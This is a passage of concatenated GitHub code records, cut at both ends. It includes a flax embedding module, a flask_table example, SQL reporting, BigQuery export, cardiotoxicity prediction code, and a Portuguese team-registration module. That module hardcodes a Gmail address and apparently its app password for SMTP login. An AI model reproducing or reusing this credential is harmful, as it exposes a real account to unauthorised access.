y\n\n\ndefault_embed_init = initializers.variance_scaling(\n 1.0, 'fan_in', 'normal', out_axis=0\n)\n\n\n@struct.dataclass\nclass Embedding:\n table: np.ndarray\n\n def lookup(self, indices):\n \"\"\"Embeds the inputs along the last dimension.\n\n Args:\n indices: input data, all dimensions are considered batch dimensions.\n\n Returns:\n Output which is embedded input data. The output shape follows the input,\n with an additional `features` dimension appended.\n \"\"\"\n if indices.dtype not in [jnp.int32, jnp.int64, jnp.uint32, jnp.uint64]:\n raise ValueError('Input type must be an integer or unsigned integer.')\n return self.table[indices]\n\n def attend(self, query):\n \"\"\"Attend over the embedding using a query array.\n\n Args:\n query: array with last dimension equal the feature depth `features` of the\n embedding.\n\n Returns:\n An array with final dim `num_embeddings` corresponding to the batched\n inner-product of the array of query vectors against each embedding.\n Commonly used for weight-sharing between embeddings and logit transform\n in NLP models.\n \"\"\"\n return jnp.dot(query, self.table.T)\n\n\ndef embedding(\n scope: Scope, num_embeddings: int, features: int, init_fn=default_embed_init\n) -> Embedding:\n \"\"\"Creates embedding dataclass.\n\n Args:\n num_embeddings: number of embeddings.\n features: Number of feature dimensions for each embedding.\n embedding_init: embedding initializer.\n\n Returns:\n Embedding dataclass with lookup and attend methods.\n \"\"\"\n table = scope.param('table', init_fn, (num_embeddings, features))\n return Embedding(table) # type: ignore\n","repo_name":"google/flax","sub_path":"flax/core/nn/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":11599,"program_lang":"python","lang":"en","doc_type":"code","stars":4905,"dataset":"github-code","pt":"31"} +{"seq_id":"20110004980","text":"from flask_table import Table, Col, NestedTableCol\n\n\n\"\"\"Lets suppose that we have a class that we get an iterable of from\nsomewhere, such as a database. We can declare a table that pulls out\nthe relevant entries, escapes them and displays them. 
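One note on the `Embedding` dataclass that closes the flax record above: `attend` is plain logit weight tying, the lookup table doubling as the output projection. A standalone sketch with assumed sizes:

```python
import jax.numpy as jnp
from jax import random

vocab, features = 100, 16
table = random.normal(random.PRNGKey(0), (vocab, features))  # embedding table

tokens = jnp.array([3, 42, 7])
embedded = table[tokens]             # lookup(): shape (3, features)
logits = jnp.dot(embedded, table.T)  # attend(): inner product against every row
assert logits.shape == (3, vocab)
```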
Additionally,\nwe show here how to use a NestedTableCol, by first defining a\nsub-table.\n\n\"\"\"\n\n\nclass SubItem(object):\n    def __init__(self, col1, col2):\n        self.col1 = col1\n        self.col2 = col2\n\n\nclass Item(object):\n    def __init__(self, name, description, subtable):\n        self.name = name\n        self.description = description\n        self.subtable = subtable\n\n\nclass SubItemTable(Table):\n    col1 = Col('Sub-column 1')\n    col2 = Col('Sub-column 2')\n\n\nclass ItemTable(Table):\n    name = Col('Name')\n    description = Col('Description')\n    subtable = NestedTableCol('Subtable', SubItemTable)\n\n\ndef main():\n    items = [Item('Name1', 'Description1', [SubItem('r1sr1c1', 'r1sr1c2'),\n                                            SubItem('r1sr2c1', 'r1sr2c2')]),\n             Item('Name2', 'Description2', [SubItem('r2sr1c1', 'r2sr1c2'),\n                                            SubItem('r2sr2c1', 'r2sr2c2')]),\n             ]\n\n    table = ItemTable(items)\n\n    # or {{ table }} in jinja\n    print(table.__html__())\n\n    \"\"\"Outputs:\n\n    <table>\n        <thead>\n            <tr>\n                <th>Name</th><th>Description</th><th>Subtable</th>\n            </tr>\n        </thead>\n        <tbody>\n            <tr>\n                <td>Name1</td><td>Description1</td>\n                <td>\n                    <table>\n                        <thead>\n                            <tr>\n                                <th>Sub-column 1</th><th>Sub-column 2</th>\n                            </tr>\n                        </thead>\n                        <tbody>\n                            <tr>\n                                <td>r1sr1c1</td><td>r1sr1c2</td>\n                            </tr>\n                            <tr>\n                                <td>r1sr2c1</td><td>r1sr2c2</td>\n                            </tr>\n                        </tbody>\n                    </table>\n                </td>\n            </tr>\n            <tr>\n                <td>Name2</td><td>Description2</td>\n                <td>\n                    <table>\n                        <thead>\n                            <tr>\n                                <th>Sub-column 1</th><th>Sub-column 2</th>\n                            </tr>\n                        </thead>\n                        <tbody>\n                            <tr>\n                                <td>r2sr1c1</td><td>r2sr1c2</td>\n                            </tr>\n                            <tr>\n                                <td>r2sr2c1</td><td>r2sr2c2</td>\n                            </tr>\n                        </tbody>\n                    </table>\n                </td>\n            </tr>\n        </tbody>\n    </table>\n\n    Except it doesn't bother to prettify the output.\n    \"\"\"\n\nif __name__ == '__main__':\n    main()\n","repo_name":"plumdog/flask_table","sub_path":"examples/simple_nested.py","file_name":"simple_nested.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"31"}
+{"seq_id":"70767656408","text":"#!/usr/bin/python\n\n# import sys\n# sys.dont_write_bytecode = True;\n\n# library for ep.py\nimport epic as ep\nimport numpy as np\nimport sys\n\nargs = ep.parseCommandArgs() \n\n# color macro dictionary\nmc = {\"green\":\"#225522\", \"yellow\":\"#FFBB00\", \"red\":\"#BC434C\", \"purple\":\"#B82292\",\n      \"blue\":\"#4455D2\", \"white\":\"#FFFFFF\", \"ddwhite\":\"#B3B3B3\", \"dwhite\":\"#DFDFDF\",\n      \"gray\":\"#AAAAAA\", \"dgray\":\"#3F3F3F\", \"black\":\"#111111\"}\n\n# output file name\noutput = \"sc-bar.pdf\"\nif bool(args.outFile) == True:\n    output = args.outFile\n\nif bool(args.inFile) == True:\n    text = ep.tRead(args.inFile)\nelse:\n    text = ep.tRead(\"../dat/sc-bar/c1.dat\")\n\nif bool(args.style) == True:\n    style = args.style\n\n\n# parse ======================================================================\nPP = ep.PatternParser(text)\nPP.PickKeyWith(\"row\")\nPP.ParseWith(\"\\t\")\n\ndel PP.keyList[0]\n\n# Assign data: Cluster 1\nD1 = ep.Group(None, PP.getDataArr(0, opt=\"col\")[1:], color=mc[\"black\"], hatch=\"\")\nD2 = ep.Group(None, PP.getDataArr(1, opt=\"col\")[1:], color=mc[\"dwhite\"], hatch=\"\")\n\n# Assign data: Cluster 2\nD3 = ep.Group(None, PP.getDataArr(0, opt=\"col\")[1:], color=mc[\"black\"], hatch=\"\")\nD4 = ep.Group(None, PP.getDataArr(1, opt=\"col\")[1:], color=mc[\"dwhite\"], hatch=\"\")\n\nD1.setLegend(\"on-package bandwidth\")\nD2.setLegend(\"off-package bandwidth\")\n\n# set tick labels with data\nlabel = PP.getKeyArr()\nL1 = ep.TickLabel(None, label + label)\n\n# settings ===================================================================\nSBP = ep.SBarPlotter(title=\"Stacked Bar\", ylabel=\"Value\")\n\n# Set graph style\nSBP.setLegendStyle(ncol=5, size=10, frame=False, loc=\"upper center\")\nSBP.setFigureStyle(figmargin=0.05, barwidth=1, interMargin=0.5, bottomMargin=0.3)\n\n# draw =======================================================================\nSBP.setTicks(label=L1, angle=45)\nSBP.draw(D1, D2)\nSBP.setBaseOffset(1.7)\nSBP.draw(D3, D4)\nSBP.saveToPdf(output)\n","repo_name":"younghwanoh/ep-py","sub_path":"complex-examples/sc-bar.py","file_name":"sc-bar.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
+{"seq_id":"17488567612","text":"from calendar import monthrange\nfrom tkinter import messagebox\nfrom Conexion import *\nfrom Archivos import *\nimport datetime\nimport decimal\nimport time\n\n\nclass CtrlConexion():    \n    def __init__(self) -> None:\n        self.__consulta='SELECT dbo.CHECKS.CheckNumber, dbo.CHECK_DETAIL.DetailPostingTime, dbo.MAJOR_GROUP.ObjectNumber AS Expr1, dbo.CHECK_DETAIL.ObjectNumber AS PPD, dbo.MENU_ITEM_DETAIL.DefSequenceNum, dbo.CHECK_DETAIL.SalesCount, dbo.CHECK_DETAIL.Total, dbo.CHECK_DETAIL.DetailType, dbo.CHECKS.AutoGratuity, dbo.CHECKS.Other, dbo.CHECKS.SubTotal FROM dbo.MENU_ITEM_DETAIL INNER JOIN dbo.MENU_ITEM_DEFINITION ON dbo.MENU_ITEM_DETAIL.MenuItemDefID = dbo.MENU_ITEM_DEFINITION.MenuItemDefID INNER JOIN dbo.MAJOR_GROUP INNER JOIN dbo.MENU_ITEM_MASTER ON dbo.MAJOR_GROUP.ObjectNumber = dbo.MENU_ITEM_MASTER.MajGrpObjNum ON 
dbo.MENU_ITEM_DEFINITION.MenuItemMasterID = dbo.MENU_ITEM_MASTER.MenuItemMasterID RIGHT OUTER JOIN dbo.CHECK_DETAIL INNER JOIN dbo.CHECKS ON dbo.CHECK_DETAIL.CheckID = dbo.CHECKS.CheckID ON dbo.MENU_ITEM_DETAIL.CheckDetailID = dbo.CHECK_DETAIL.CheckDetailID ORDER BY PPD'\n self.__hoy=datetime.datetime.now()\n self.__db=Conexion() \n self.cargar_Conexiones()\n #self.rutina() \n\n def cargar_Conexiones(self)->None:\n self.__conexiones=Archivos.traerConexiones()\n\n def actualizar_Conexiones(self,)->None:\n Archivos.guardarArchivo(self.__conexiones)\n \n def borrarConexion(self,ofiVent)->str:\n self.cargar_Conexiones()\n dat=self.buscarConexion(ofiVent)\n if dat!=None:\n for i in range(len(self.__conexiones)):\n if dat[0]==self.__conexiones[i][0]:\n self.__conexiones.pop(i)\n self.actualizar_Conexiones()\n return f\"Conexion '{dat[0]} de {dat[1]} Borrada' \"\n return 'No se pudo borrar'\n return 'Esta conexion no existe'\n\n def modificarConexion(self,ofiVent,nuevoSName,nuevaPropiedad)->str:\n self.cargar_Conexiones()\n dat=self.buscarConexion(ofiVent)\n if dat!=None:\n if self.probarConexion(nuevoSName):\n for i in range(len(self.__conexiones)):\n if dat[2]==self.__conexiones[i][2]:\n self.__conexiones[i]=[nuevoSName,nuevaPropiedad,ofiVent]\n self.actualizar_Conexiones()\n return f\"Modificado\" \n return \"No se pudo modificar\"\n return \"Esta nueva conexion no funciona\"\n return \"Esta conexion no existe\"\n \n def buscarConexion(self,sName,prop,ofi)->list:\n self.cargar_Conexiones()\n for i in self.__conexiones: \n if sName==i[0] or prop==i[1] or ofi==i[2]: \n return i\n return None\n\n def duplicados(self,server)->bool:\n self.cargar_Conexiones()\n for i in self.__conexiones:\n if server==i[0]:\n return False\n return True \n\n def nuevaConexion(self,server,propiedad,ofiVent)->str: \n if(self.duplicados(server)):\n if self.__db.conectar(server,propiedad,ofiVent):\n self.cargar_Conexiones()\n self.__conexiones.append([server,propiedad,ofiVent])\n self.actualizar_Conexiones()\n self.__db.cerrarConexion() \n return f\"Conexion exitosa con: {server} en {propiedad}\" \n else:\n return f\"Fallo conexion con: {server} en {propiedad}\"\n return f\"({server}) Esta conexion ya existe\"\n\n def probarConexion(self,server)->bool: \n return self.__db.conectar(server,'test conect','test conect') \n \n def consultar(self,sName,sentencia)->list:\n if self.probarConexion(sName):\n return self.__db.consulta(sentencia)\n return []\n \n def ordArchDia(self,sName,prop,ofi,repDia)->None:\n fFile=list()\n disc=list()\n print(f'----------------------{prop}----------------------------')\n datos=self.consultar(sName,self.__consulta)\n try: \n for i in range(len(datos)): \n if datos[i][7]==1 and datos[i][10]!=None:\n if (self.__hoy.day-datos[i][1].day==1 and datos[i][1].hour>=3) or (self.__hoy.day-datos[i][1].day==0 and datos[i][1].hour<3): fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]]) \n elif self.__hoy.month>datos[i][1].month and datos[i][1].day==monthrange(self.__hoy.year,datos[i][1].month)[1]: fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]])\n elif self.__hoy.year>datos[i][1].year and datos[i][1].day==monthrange(datos[i][1].year,datos[i][1].month)[1]: fFile.append([datos[i][0],datos[i][1],datos[i][2],datos[i][3],datos[i][4],datos[i][5],datos[i][6],datos[i][7],datos[i][8],datos[i][9]])\n if datos[i][7]==2: 
disc.append([datos[i][5],datos[i][6]])\n fFile=self.ordenarArchivo(fFile,disc,ofi)\n Archivos.escArchDia(fFile,prop,ofi,datos[i][1].strftime('%d-%m-%Y'))\n if repDia: Archivos.reportes(fFile,prop,ofi,datos[i][1].strftime('%d-%m-%Y %H:%M'))\n except Exception as e:\n messagebox.showerror(message=f'Error de conexion en {prop}:\\n Descripcion: {e}',title='ERROR')\n\n def ordenarArchivo(self,datos,disc,ofi)->list:\n desc=[0,0]\n dat=list()\n props=self.orgPropinas(datos,ofi)\n print('propinas')\n datos=self.totales(datos,list())\n print('totales')\n datos=self.delCeros(datos)\n print('quitar 0')\n for i in datos: dat.append(['Concepto','10','00','MST',i[2],ofi,str(i[4]),i[3],i[5],i[6]])\n dat=self.addConJer(dat)\n print('conceto jerarquias')\n dat=self.addConJerDev(dat)\n print('conjer dev')\n dat=self.addDefM(dat)\n print('MST')\n ico=self.addIco(dat,ofi)\n print('ICO')\n if len(props)>0: dat.append(props)\n for c in disc: \n if (c[0] and desc[0])!=None: desc[0]=desc[0]+c[0]\n if (c[1] and desc[1])!=None: desc[1]=desc[1]+c[1]\n if (desc[0] or desc[1])>0: dat.append(['0014',10,'00','','',ofi,'',3,desc[0],round(desc[1]*-1)])\n dat.append(ico)\n return dat\n\n def totales(self,datos,totales)->list:\n while len(datos)!=0:\n try: \n if datos[0][2]==datos[1][2] and datos[0][3]==datos[1][3] and datos[0][4]==datos[1][4]:\n datos[0][5]=datos[0][5]+datos[1][5]\n datos[0][6]=datos[0][6]+datos[1][6]\n datos.pop(1) \n else:\n datos[0][5]=datos[0][5]\n datos[0][6]=datos[0][6]/decimal.Decimal('1.08')\n totales.append(datos[0])\n datos.pop(0) \n except IndexError:\n datos[0][5]=datos[0][5]\n datos[0][6]=datos[0][6]/decimal.Decimal('1.08')\n totales.append(datos[0])\n return totales\n except TypeError: \n if datos[0][5]==None: datos.pop(0)\n elif datos[1][5]==None: datos.pop(1)\n elif datos[0][6]==None: datos.pop(0)\n elif datos[1][6]==None: datos.pop(1) \n return totales\n \n def delCeros(self,datos)->list: \n i=0\n while i0:\n print(c)\n datos[c][0]=aux[0]\n datos[c][4]=aux[1]\n c+=1\n return datos\n\n def addConJerDev(self,datos)->list:\n for i in range(len(datos)):\n if datos[i][7]<0 and datos[i][8]<0:\n aux=self.buscarConJerDev(datos[i][4]) \n datos[i][0]=aux[0]\n datos[i][4]=aux[1]\n datos[i][7]=datos[i][7]*-1\n datos[i][8]=datos[i][8]*-1\n return datos\n\n def addDefM(self,datos):\n for c in range(len(datos)):\n aux=self.buscarDefM(datos[c][5],datos[c][6])\n datos[c][3]=aux[0]\n datos[c][6]=aux[1]\n return datos\n\n def orgPropinas(self,datos,ofi)->list:\n sum=0 \n check=[]\n dat=[] \n for c in range(len(datos)):\n if datos[c][0] not in check: \n check.append(datos[c][0])\n dat.append(datos[c])\n for c in dat:\n if c[8]!=None: sum+=c[8]\n if c[9]!=None: sum+=c[9]\n if sum==0: return[]\n return ['0007',10,'00','','',ofi,'','','',round(sum)]\n\n def addIco(self,datos,ofi)->list:\n sum=0\n for c in datos:\n sum+=round(decimal.Decimal(str(c[9])))\n sum=round(sum*0.08)\n print(sum)\n return ['0005',10,'00','','',ofi,'','','',sum]\n\n def unoDiezReportes(self): \n try:\n for i in os.listdir('Consultas/'): \n datos=list() \n for j in os.listdir(f'Consultas/{i}'): \n f=os.path.join(f'Consultas/{i}/',j) \n if os.path.isfile(f) and j.endswith('.txt'): \n with open(f,'r') as txtfile:\n aux=txtfile.readlines() \n for k in aux:\n datos.append(k.replace('\\n','').split(';'))\n txtfile.close()\n aux2=self.buscarConexion('',i.split('-')[0],'')\n fecha=datetime.datetime.strptime(datos[len(datos)-1][1],'%d%m%Y %H:%M')\n fecha=fecha.strftime('%d%m%Y') \n Archivos.reportes(datos,aux2[1],aux2[2],fecha)\n except Exception 
as e:\n print(f'Error: {e}')\n\n def rutina(self):\n self.__hoy=datetime.datetime.now()\n for i in self.__conexiones:\n if self.__hoy.day<11: \n self.ordArchDia(i[0],i[1],i[2],True)\n elif self.__hoy.day==11: \n self.ordArchDia(i[0],i[1],i[2],False)\n self.unoDiezReportes()\n elif self.__hoy.day>11: \n self.ordArchDia(i[0],i[1],i[2],True)\n else:\n print('Error inesperado')\n\n def getConexiones(self)->list():\n self.cargar_Conexiones()\n return self.__conexiones\n\n \n \n \n ","repo_name":"DesarrolloZK/prueba-repo","sub_path":"CtrlConexion.py","file_name":"CtrlConexion.py","file_ext":"py","file_size_in_byte":11885,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71283081048","text":"import re\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n#Admito ter simpatizado bastante com o try/except\n#Aqui as classes aluno e cap estão quase a mesma coisa, nada muito grande foi mudado\n#Mas houve mudanças\nclass Pessoa:\n def __init__(self, nome, email, num_matricula):\n self.nome = nome\n self.email = email\n self.num_matricula = num_matricula\nclass AlunoEquipe(Pessoa):\n def __init__(self, nome, email, num_matricula, curso, data_nascimento, num_camisa):\n super().__init__(nome, email, num_matricula)\n self.curso = curso\n self.data_nascimento = data_nascimento\n self.num_camisa = num_camisa\n def cadastrar_aluno(self, nome_aluno,curso_aluno, email_aluno, num_matricula_aluno, data_nascimento_aluno, num_camisa_aluno):\n #RAISE ERROR - EMAIL INVALIDO\n if not self._verificar_email(email_aluno):\n raise ValueError(\"O e-mail deve estar no formato do Gmail.\")\n #Este trecho chama o método _verificar_email\n #Este método recebe um email como argumento e verifica se ele atende a um padrão específico.\n #RAISE ERROR - NÚMERO DE MATRÍCULA INVÁLIDO\n if len(num_matricula_aluno) != 13:\n raise ValueError(\"O número de matrícula deve ter exatamente 13 dígitos.\")\n #Esse trecho verifica o comprimento da variável num_matricula_aluno.\n #O objetivo dessa verificação é garantir que a matrícula do aluno tenha exatamente 13 dígitos.\n\n with open(\"alunos_cadastrados.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n arquivo.write(f\"Nome Completo: {nome_aluno}, Curso: {curso_aluno}, E-mail: {email_aluno}, Numero de Matricula: {num_matricula_aluno}, Data de Nascimento: {data_nascimento_aluno}, Número da camisa: {num_camisa_aluno}\\n\")\n \n #ESSA FUNÇÃO TRABLAHA EM CONJUNTO COM O RAISE ERROR - EMAIL INVALIDO.\n #_verificar_email verifica se o e-mail contém o domínio \"@gmail.com\" e a validação com raise é acionada se essa verificação falha. \n #Aqui, eu defini o método _verificar_email, que aceita como único argumento o email. \n #Esse método irá verificar se o endereço de e-mail está no formato do Gmail.\n @staticmethod\n def _verificar_email(email):\n \"\"\"Verifica se o e-mail é do Gmail.\"\"\"\n #Aqui, eu defini um padrão de expressão regular(regex)que vai ser usado para verificar o formato do e-mail.\n #O padrão [^@]+@gmail\\.com está procurando por e-mails que tenham o domínio gmail.com. 
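A caveat on the `_verificar_email` pattern used in this record: `re.match` anchors only at the start of the string, so an address with trailing junk still validates; `re.fullmatch` closes that hole. Illustrative strings only:

```python
import re

pattern = r"[^@]+@gmail\.com"

print(bool(re.match(pattern, "user@gmail.com")))               # True
print(bool(re.match(pattern, "user@gmail.com.evil.org")))      # True (not end-anchored)
print(bool(re.fullmatch(pattern, "user@gmail.com.evil.org")))  # False
```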
\n pattern = r\"[^@]+@gmail\\.com\"\n #Esta linha vai verificar se o e-mail passado como argumento corresponde ao padrão definido anteriormente.\n return bool(re.match(pattern, email))\n\n#MESMO RAISE ERROR PARA CAPITAOEQUIPE\nclass CapitaoEquipe(Pessoa):\n def __init__(self, nome, email, num_matricula, curso, data_nascimento, num_camisa):\n super().__init__(nome, email, num_matricula)\n self.curso = curso\n self.data_nascimento = data_nascimento\n self.num_camisa = num_camisa\n\n def cadastrar_capitao(self, curso_capitao, nome_capitao, email_capitao, num_matricula_capitao, data_nascimento_capitao,num_camisa_capitao):\n if not self._verificar_email(email_capitao):\n raise ValueError(\"O e-mail deve estar no formato do Gmail.\")\n if len(num_matricula_capitao) != 13:\n raise ValueError(\"O número de matrícula deve ter exatamente 13 dígitos.\")\n with open(\"capitao_cadastro.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n arquivo.write(f\"Curso: {curso_capitao}, Nome Completo: {nome_capitao}, E-mail: {email_capitao}, Número de Matrícula: {num_matricula_capitao}, Data de nascimento: {data_nascimento_capitao}, Número da camisa: {num_camisa_capitao}\\n\")\n lista_membros = SistemaDeCadastro.obter_lista_membros()\n #IMPLEMENTAÇÃO DE DICIONÁRIO PARA ARMAZENAR OS MEMBROS DA EQUIPE\n membros_por_curso = {}\n for membro in lista_membros:\n curso_membro = membro['Curso']\n if curso_membro == curso_capitao:\n if curso_membro not in membros_por_curso:\n membros_por_curso[curso_membro] = []\n membros_por_curso[curso_membro].append(membro)\n #IMPLEMENTAÇÃO DE LISTAS PARES PARA ARMAZENAR OS MEMBROS DA EQUIPE\n capitao = {\n \"Nome Completo\": nome_capitao,\n \"E-mail\": email_capitao,\n \"Número de Matrícula\": num_matricula_capitao,\n \"Data de Nascimento\": data_nascimento_capitao,\n \"Número da Camisa\": num_camisa_capitao}\n if curso_capitao in membros_por_curso:\n membros_por_curso[curso_capitao].append(capitao)\n else:\n membros_por_curso[curso_capitao] = [capitao] \n #IMPLEMENTAÇÃO DE LISTAS PARES PARA ARMAZENAR OS MEMBROS FORMATADOS DA EQUIPE\n lista_membros_formatada = []\n for curso, membros in membros_por_curso.items():\n membros_formatados = []\n for membro in membros:\n membro_str = f\"Nome Completo: {membro['Nome Completo']}, Curso: {curso}, E-mail: {membro['E-mail']}, Número de Matrícula: {membro['Número de Matrícula']}, Data de Nascimento: {membro['Data de Nascimento']}, Número da Camisa: {membro['Número da Camisa']}\"\n membros_formatados.append(membro_str)\n lista_membros_curso = \"\\n\".join(membros_formatados)\n lista_membros_formatada.append(lista_membros_curso)\n lista_membros_str = \"\\n\\n\".join(lista_membros_formatada)\n self.enviar_email_confirmacao(email_capitao, nome_capitao, lista_membros_str)\n def enviar_email_confirmacao(self, email_capitao, nome_capitao, lista_membros_str):\n email_remetente = email_capitao\n email_destinatario = \"projetoum8@gmail.com\"\n senha_destinatario = \"cswldlepklocmidl\"\n mensagem = MIMEMultipart()\n mensagem[\"From\"] = email_remetente\n mensagem[\"To\"] = email_destinatario\n mensagem[\"Subject\"] = \"Confirmação de Cadastro\"\n texto_email = f\"\"\"\n Olá, eu sou {nome_capitao}, \n E estou finalizando o meu cadastro como capitão da minha equipe, na modalidade vôlei de areia! 
\n    Segue abaixo a lista de membros inscritos na equipe:\n    {lista_membros_str}\n    E meu e-mail para caso algo não esteja de acordo: \n    {email_capitao}\n    Obrigado!\n    Atenciosamente, \n    {nome_capitao}\n    \"\"\"\n        parte_texto = MIMEText(texto_email, \"plain\")\n        mensagem.attach(parte_texto)\n        try:\n            servidor_smtp = smtplib.SMTP(\"smtp.gmail.com\", 587)\n            servidor_smtp.starttls()\n            servidor_smtp.login(email_destinatario, senha_destinatario)\n            servidor_smtp.sendmail(email_remetente,email_destinatario,mensagem.as_string())\n            servidor_smtp.quit()\n            print(\"Email de confirmação enviado com sucesso!\")\n        except smtplib.SMTPException as e:\n            print(\"Ocorreu um erro ao enviar o email de confirmação:\", str(e))\n    @staticmethod\n    def _verificar_email(email):\n        \"\"\"Check whether the e-mail is a Gmail address.\"\"\"\n        pattern = r\"[^@]+@gmail\\.com\"\n        return bool(re.match(pattern, email))\nclass SistemaDeCadastro:\n    @classmethod\n    def autenticar(cls, senha, senha_armazenada):\n        return senha == senha_armazenada\n    # The autenticar method compares the supplied password with the stored one\n    # If the passwords match it returns True; otherwise it returns False.\n    @classmethod\n    def cadastrar_professor(cls, professor):\n        with open(\"professores.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n            arquivo.write(f\"{professor.nome},{professor.email},{professor.num_matricula},{professor.senha}\\n\")\n    # This method appends a new professor's data to the \"professores.txt\" file.\n    # It formats the professor's data and writes it to the file,\n    # ensuring each professor record is separated by a line break.\n    @staticmethod\n    def obter_lista_membros():\n        try:\n            with open(\"alunos_cadastrados.txt\", \"r\") as arquivo:\n                linhas = arquivo.readlines()\n                membros = []\n                for linha in linhas:\n                    campos = linha.strip().split(\",\")\n                    nome_completo = campos[0].split(\":\")[1].strip()\n                    curso = campos[1].split(\":\")[1].strip()\n                    email = campos[2].split(\":\")[1].strip()\n                    num_matricula = campos[3].split(\":\")[1].strip()\n                    data_nascimento = campos[4].split(\":\")[1].strip()\n                    num_camisa = campos[5].split(\":\")[1].strip()\n                    membro = {\n                        \"Nome Completo\": nome_completo,\n                        \"Curso\": curso,\n                        \"E-mail\": email,\n                        \"Número de Matrícula\": num_matricula,\n                        \"Data de Nascimento\": data_nascimento,\n                        \"Número da Camisa\": num_camisa\n                    }\n                    membros.append(membro)\n                return membros\n        except FileNotFoundError:\n            return []","repo_name":"MARIA-LUIZ4/Programa-o_Orientada_A_Objetos_4bimestre","sub_path":"classe.py","file_name":"classe.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24672435886","text":"import numpy\nimport pandas\nfrom google.cloud import bigquery\n\nclient = bigquery.Client()\n\ndef getData():\n    query = client.run_sync_query(\"\"\"\n    SELECT\n    a_user_key,\n    a_acpid,\n    a_title,\n    url\n    FROM\n    traffic.events\n    WHERE\n    _PARTITIONTIME=TIMESTAMP('2017-02-17')\n    AND a_acpid IS NOT NULL\n    AND a_title IS NOT NULL\n    AND a_hidden=FALSE\n    AND a_user_key IS NOT NULL\n    ;\"\"\")\n\n    query.use_legacy_sql = False\n    print(\"Running query\")\n    query.run()\n\n    data = []\n    pageToken = None\n\n    while True:\n        print(\"Fetching page\")\n        rows, totalRows, pageToken = query.fetch_data(page_token=pageToken)\n        for row in rows:\n            data.append(list(row))\n        if not pageToken:\n            break\n    data = numpy.array(data)  # build the array from the accumulated pages, not just the last 'rows' iterator\n    df = pandas.DataFrame(data=data, columns=[\"userId\", \"articleId\", \"articleTitle\", \"url\"])\n    return df\n\ndef test():\n    a = (\"2017-02-17 00:29:34\", \"a43b1769-a341-46ec-b1aa-c330c429bcb7\", \"5-35-386704\", \"– Hjertet mitt slo ikke på 20 minutter\", \"http://mobil.oa.no/nyheter/harestua/hadeland/hjertet-mitt-slo-ikke-pa-20-minutter/s/5-35-386704\")\n    row = []\n    row.append(list(a))\n    row.append(list(a))\n    data = numpy.array(row)\n    df = pandas.DataFrame(index=data[:, 0], data=data[:, 1:], columns=[\"userId\", \"articleId\", \"articleTitle\", \"url\"])\n    print(df)\n\nif __name__ == \"__main__\":\n    df = getData()\n    print(\"printing to hdf5\")\n    df.to_hdf(\"read_20170217.h5\", key=\"read\")\n    print(\"Complete!\")\n    # test()\n","repo_name":"rugern/zion","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
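getData() above pages through BigQuery results by hand, passing the page token from fetch_data back in until it is exhausted. A minimal sketch of the same fetch against a newer google-cloud-bigquery client, where result() returns a RowIterator that follows page tokens automatically; the column names are taken from the query above, and get_data_paged is a hypothetical helper name, not part of the original module:

from google.cloud import bigquery
import pandas

def get_data_paged(sql):
    client = bigquery.Client()
    row_iter = client.query(sql).result()      # RowIterator pages transparently
    data = [list(row) for row in row_iter]     # accumulate rows from every page
    return pandas.DataFrame(data=data, columns=["userId", "articleId", "articleTitle", "url"])
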
 +{"seq_id":"9565285592","text":"import os\r\nimport joblib\r\nimport sys\r\nfrom typing import List\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\n\r\nfrom CToxPred.pairwise_correlation import CorrelationThreshold\r\nfrom CToxPred.utils import compute_fingerprint_features, \\\r\n    compute_descriptor_features, compute_metrics\r\nfrom CToxPred.hERG_model import hERGClassifier\r\nfrom CToxPred.nav15_model import Nav15Classifier\r\nfrom CToxPred.cav12_model import Cav12Classifier\r\n\r\n\r\n\r\ndef _generate_predictions(smiles_list: List[str]) -> None:\r\n    \"\"\"\r\n    Generates predictions for hERG, Nav1.5, and Cav1.2 targets based on the provided list of SMILES.\r\n\r\n    This function processes the input SMILES list and computes fingerprint and descriptor features for each compound.\r\n    Then, it loads pre-trained models for hERG, Nav1.5, and Cav1.2 targets, and predicts the activity of each compound\r\n    for these targets using the respective models. The predictions are saved to a CSV file named 'predictions.csv'\r\n    with columns: 'SMILES', 'hERG', 'Nav1.5', and 'Cav1.2'. The 'hERG', 'Nav1.5', and 'Cav1.2' columns contain the\r\n    binary predictions (0 or 1) for each target, representing non-toxic (negative class) or toxic (positive class)\r\n    compounds, respectively.\r\n\r\n    Parameters:\r\n    smiles_list: List[str] \r\n        A list containing SMILES strings of chemical compounds.\r\n\r\n    Returns:\r\n    None: \r\n        The function saves the predictions to a CSV file named 'predictions.csv'.\r\n    \"\"\"\r\n    # Compute features\r\n    print('>>>>>>> Calculate Features <<<<<<<')\r\n    fingerprints = compute_fingerprint_features(smiles_list)\r\n    descriptors = compute_descriptor_features(smiles_list)\r\n    # Process hERG\r\n    print('>>>>>>> Predict hERG <<<<<<<')\r\n    hERG_fingerprints = fingerprints\r\n    ## Load model\r\n    hERG_predictor = hERGClassifier(1905, 2)\r\n    path = ['CToxPred', 'models', 'model_weights', 'hERG',\r\n            '_herg_checkpoint.model']\r\n    hERG_predictor.load(os.path.join(*path))\r\n    device = torch.device('cpu')\r\n    hERG_predictions = hERG_predictor(\r\n        torch.from_numpy(hERG_fingerprints).float().to(device)).argmax(1).cpu()\r\n\r\n    # Process Nav1.5\r\n    print('>>>>>>> Predict Nav1.5 <<<<<<<')\r\n    nav15_fingerprints = fingerprints\r\n    nav15_descriptors = descriptors\r\n    ## Load preprocessing pipeline\r\n    